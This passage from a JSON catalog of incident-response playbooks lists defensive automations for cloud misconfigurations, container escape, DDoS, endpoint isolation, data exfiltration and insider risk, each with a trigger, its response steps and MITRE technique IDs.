Revokes the added trust and audits.", "version": "1.0.0", "author": "AiSOC", "tags": [ "cloud-misconfig", "cloud", "aws", "iam" ], "severity": "critical", "trigger": "alert", "steps": 4, "category": "cloud-misconfig", "mitre_techniques": [ "T1078.004" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/cloud-misconfig/cloud-cross-account-trust.playbook.json" }, { "id": "cloud-gke-anonymous-v1", "type": "playbook", "name": "Cloud: GKE Cluster Anonymous Auth", "description": "Triggered when a GKE cluster is configured to allow anonymous Kubernetes API access. Disables anonymous authentication and audits.", "version": "1.0.0", "author": "AiSOC", "tags": [ "cloud-misconfig", "cloud", "gcp", "kubernetes" ], "severity": "critical", "trigger": "alert", "steps": 4, "category": "cloud-misconfig", "mitre_techniques": [ "T1190" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/cloud-misconfig/cloud-gke-anonymous.playbook.json" }, { "id": "cloud-iam-overpriv-v1", "type": "playbook", "name": "Cloud: Over-Privileged IAM \u2014 Detach & Review", "description": "Triggered when IAM Access Analyzer flags an over-privileged role. Detaches the policy and opens an owner-review ticket.", "version": "1.0.0", "author": "AiSOC", "tags": [ "cloud-misconfig", "cloud", "aws", "iam" ], "severity": "high", "trigger": "alert", "steps": 4, "category": "cloud-misconfig", "mitre_techniques": [ "T1078.004" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/cloud-misconfig/cloud-iam-overpriv.playbook.json" }, { "id": "cloud-key-leak-v1", "type": "playbook", "name": "Cloud: Cloud Access Key Leaked", "description": "Triggered when a long-lived access key is found in a public repo or paste site. 
Rotates the key and scans for downstream use.", "version": "1.0.0", "author": "AiSOC", "tags": [ "cloud-misconfig", "cloud", "secrets" ], "severity": "critical", "trigger": "alert", "steps": 5, "category": "cloud-misconfig", "mitre_techniques": [ "T1552.001" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/cloud-misconfig/cloud-key-leak.playbook.json" }, { "id": "cloud-mfa-disabled-root-v1", "type": "playbook", "name": "Cloud: Root Account MFA Disabled", "description": "Triggered when root MFA is disabled. Re-enables MFA and pages the cloud-platform owner immediately.", "version": "1.0.0", "author": "AiSOC", "tags": [ "cloud-misconfig", "cloud", "iam", "mfa" ], "severity": "critical", "trigger": "alert", "steps": 4, "category": "cloud-misconfig", "mitre_techniques": [ "T1556" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/cloud-misconfig/cloud-mfa-disabled-root.playbook.json" }, { "id": "cloud-rds-public-v1", "type": "playbook", "name": "Cloud: RDS Instance Publicly Accessible", "description": "Triggered when an RDS instance toggles to publicly accessible. Removes public access and audits.", "version": "1.0.0", "author": "AiSOC", "tags": [ "cloud-misconfig", "cloud", "aws", "rds" ], "severity": "critical", "trigger": "alert", "steps": 4, "category": "cloud-misconfig", "mitre_techniques": [ "T1190" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/cloud-misconfig/cloud-rds-public.playbook.json" }, { "id": "cloud-s3-public-v1", "type": "playbook", "name": "Cloud: S3 Bucket Public \u2014 Re-private & Audit", "description": "Triggered by `s3-public-bucket` detection. 
Sets the bucket private, enables Block Public Access, and audits the last 7 days of access logs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "cloud-misconfig", "cloud", "aws", "s3" ], "severity": "critical", "trigger": "alert", "steps": 5, "category": "cloud-misconfig", "mitre_techniques": [ "T1530" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/cloud-misconfig/cloud-s3-public.playbook.json" }, { "id": "cloud-security-group-open-v1", "type": "playbook", "name": "Cloud: Security Group Opens 0.0.0.0/0", "description": "Triggered when a security group rule allows ingress from 0.0.0.0/0 to a sensitive port. Closes the rule and audits the change.", "version": "1.0.0", "author": "AiSOC", "tags": [ "cloud-misconfig", "cloud", "aws", "network" ], "severity": "critical", "trigger": "alert", "steps": 4, "category": "cloud-misconfig", "mitre_techniques": [ "T1190" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/cloud-misconfig/cloud-security-group-open.playbook.json" }, { "id": "container-escape-response-v1", "type": "playbook", "name": "Container Escape: Runtime Breach Response", "description": "Triggered by container runtime security alert (Falco, Sysdig, or similar) indicating a container escape attempt or successful breakout to the host. 
Kills the offending container, isolates the node, and preserves evidence.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "container-escape", "container", "kubernetes" ], "severity": "critical", "trigger": "alert", "steps": 9, "category": "container-escape", "mitre_techniques": [ "T1611", "T1610" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/container-escape/container-escape-response.playbook.json" }, { "id": "ddos-amplification-dns-v1", "type": "playbook", "name": "DDoS: DNS Amplification", "description": "Triggered when an inbound spike of crafted DNS queries hits an authoritative server that is being abused as a reflector. Sinkholes the spoofed query sources (the addresses of the reflection victim) so the server stops amplifying traffic toward them.", "version": "1.0.0", "author": "AiSOC", "tags": [ "ddos", "ddos", "dns" ], "severity": "high", "trigger": "alert", "steps": 4, "category": "ddos", "mitre_techniques": [ "T1498.002" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/ddos/ddos-amplification-dns.playbook.json" }, { "id": "ddos-app-layer-l7-v1", "type": "playbook", "name": "DDoS: Application Layer L7", "description": "Triggered by an anomalous L7 request rate or pattern. Engages a WAF rate-limit rule and challenge page.", "version": "1.0.0", "author": "AiSOC", "tags": [ "ddos", "ddos", "waf" ], "severity": "critical", "trigger": "alert", "steps": 5, "category": "ddos", "mitre_techniques": [ "T1498.001" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/ddos/ddos-app-layer-l7.playbook.json" }, { "id": "ddos-credential-stuffing-fraud-v1", "type": "playbook", "name": "DDoS: Auth-Endpoint Credential Stuffing", "description": "Triggered when /login takes a sustained spike of failed attempts. 
Combines DDoS + credential-stuffing response: WAF challenge, rate-limit, source-IP block.", "version": "1.0.0", "author": "AiSOC", "tags": [ "ddos", "ddos", "ato" ], "severity": "high", "trigger": "alert", "steps": 6, "category": "ddos", "mitre_techniques": [ "T1110.004" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/ddos/ddos-credential-stuffing-fraud.playbook.json" }, { "id": "ddos-syn-flood-v1", "type": "playbook", "name": "DDoS: SYN Flood", "description": "Triggered by SYN flood pattern at edge. Enables SYN cookies and increases backend capacity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "ddos", "ddos", "network" ], "severity": "critical", "trigger": "alert", "steps": 5, "category": "ddos", "mitre_techniques": [ "T1498" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/ddos/ddos-syn-flood.playbook.json" }, { "id": "ddos-volumetric-l3-v1", "type": "playbook", "name": "DDoS: Volumetric L3/L4", "description": "Triggered by volumetric flood detection at edge. Engages scrubbing provider and pages on-call.", "version": "1.0.0", "author": "AiSOC", "tags": [ "ddos", "ddos", "network" ], "severity": "critical", "trigger": "alert", "steps": 4, "category": "ddos", "mitre_techniques": [ "T1498" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/ddos/ddos-volumetric-l3.playbook.json" }, { "id": "endpoint-isolation-response-v1", "type": "playbook", "name": "Endpoint Isolation: EDR-Driven Host Quarantine", "description": "Triggered when an endpoint requires emergency isolation due to confirmed or high-confidence compromise (ransomware spread, active C2 communication, lateral movement staging). 
Uses EDR to network-isolate the host while preserving management connectivity, collects forensic artifacts, and notifies the SOC.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "endpoint-isolation", "edr", "quarantine", "host-isolation" ], "severity": "critical", "trigger": "alert", "steps": 11, "category": "endpoint-isolation", "mitre_techniques": [ "T1562.001", "T1204", "T1486" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/endpoint-isolation/endpoint-isolation-response.playbook.json" }, { "id": "exfil-archive-egress-v1", "type": "playbook", "name": "Exfil: Archive File Egress (.zip / .7z / .rar)", "description": "Triggered when a host uploads an archive to an external destination. Holds the file in the DLP review queue and notifies the user's manager.", "version": "1.0.0", "author": "AiSOC", "tags": [ "data-exfil", "exfil", "dlp", "archive" ], "severity": "high", "trigger": "alert", "steps": 5, "category": "data-exfil", "mitre_techniques": [], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/data-exfil/exfil-archive-egress.playbook.json" }, { "id": "exfil-dns-tunneling-v1", "type": "playbook", "name": "Exfil: DNS Tunneling", "description": "Triggered by high-entropy, abnormally long DNS queries from a host. Sinkholes the suspect domain and isolates the host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "data-exfil", "exfil", "dns" ], "severity": "critical", "trigger": "alert", "steps": 6, "category": "data-exfil", "mitre_techniques": [ "T1071.004" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/data-exfil/exfil-dns-tunneling.playbook.json" }, { "id": "exfil-large-upload-v1", "type": "playbook", "name": "Exfil: Large Outbound Upload", "description": "Triggered when a host uploads more than a configured threshold (X GB) to a non-corporate destination in a short window. 
Blocks the destination and investigates.", "version": "1.0.0", "author": "AiSOC", "tags": [ "data-exfil", "exfil", "dlp" ], "severity": "critical", "trigger": "alert", "steps": 5, "category": "data-exfil", "mitre_techniques": [ "T1567" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/data-exfil/exfil-large-upload.playbook.json" }, { "id": "exfil-personal-cloud-v1", "type": "playbook", "name": "Exfil: Personal Cloud Storage Upload", "description": "Triggered when corporate data is uploaded to a personal cloud account (personal Drive, Dropbox, iCloud). Blocks the destination and notifies the user's manager.", "version": "1.0.0", "author": "AiSOC", "tags": [ "data-exfil", "exfil", "saas" ], "severity": "high", "trigger": "alert", "steps": 4, "category": "data-exfil", "mitre_techniques": [ "T1567.002" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/data-exfil/exfil-personal-cloud.playbook.json" }, { "id": "exfil-removable-media-v1", "type": "playbook", "name": "Exfil: Sensitive Data to Removable Media", "description": "Triggered when a sensitive file is written to a USB volume. Blocks USB writes via EDR policy and opens a ticket.", "version": "1.0.0", "author": "AiSOC", "tags": [ "data-exfil", "exfil", "endpoint", "usb" ], "severity": "medium", "trigger": "alert", "steps": 4, "category": "data-exfil", "mitre_techniques": [ "T1052" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/data-exfil/exfil-removable-media.playbook.json" }, { "id": "ids-critical-response-v1", "type": "playbook", "name": "IDS/IPS Critical Alert: Network Intrusion Response", "description": "Triggered by an IDS/IPS signature at critical severity indicating active exploitation, C2 communication, or lateral movement detected at the network layer. 
Enriches the source IP, blocks its traffic, and escalates.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "ids-critical", "ids", "ips", "network", "intrusion" ], "severity": "critical", "trigger": "alert", "steps": 9, "category": "ids-critical", "mitre_techniques": [ "T1046", "T1190", "T1071" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/ids-critical/ids-critical-response.playbook.json" }, { "id": "insider-after-hours-access-v1", "type": "playbook", "name": "Insider: Anomalous After-Hours Access", "description": "Triggered when a user accesses sensitive systems outside their normal pattern. Requires step-up MFA and logs the access for HR review.", "version": "1.0.0", "author": "AiSOC", "tags": [ "insider-risk", "insider", "anomaly" ], "severity": "medium", "trigger": "alert", "steps": 4, "category": "insider-risk", "mitre_techniques": [ "T1078" ], "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "playbooks/packs/v1/insider-risk/insider-after-hours-access.playbook.json" }, { "id": "insider-mass-download-v1", "type": "playbook", "name": "Insider: Mass File Download", "description": "Triggered when a single user downloads >N files from a sensitive store in N hosts in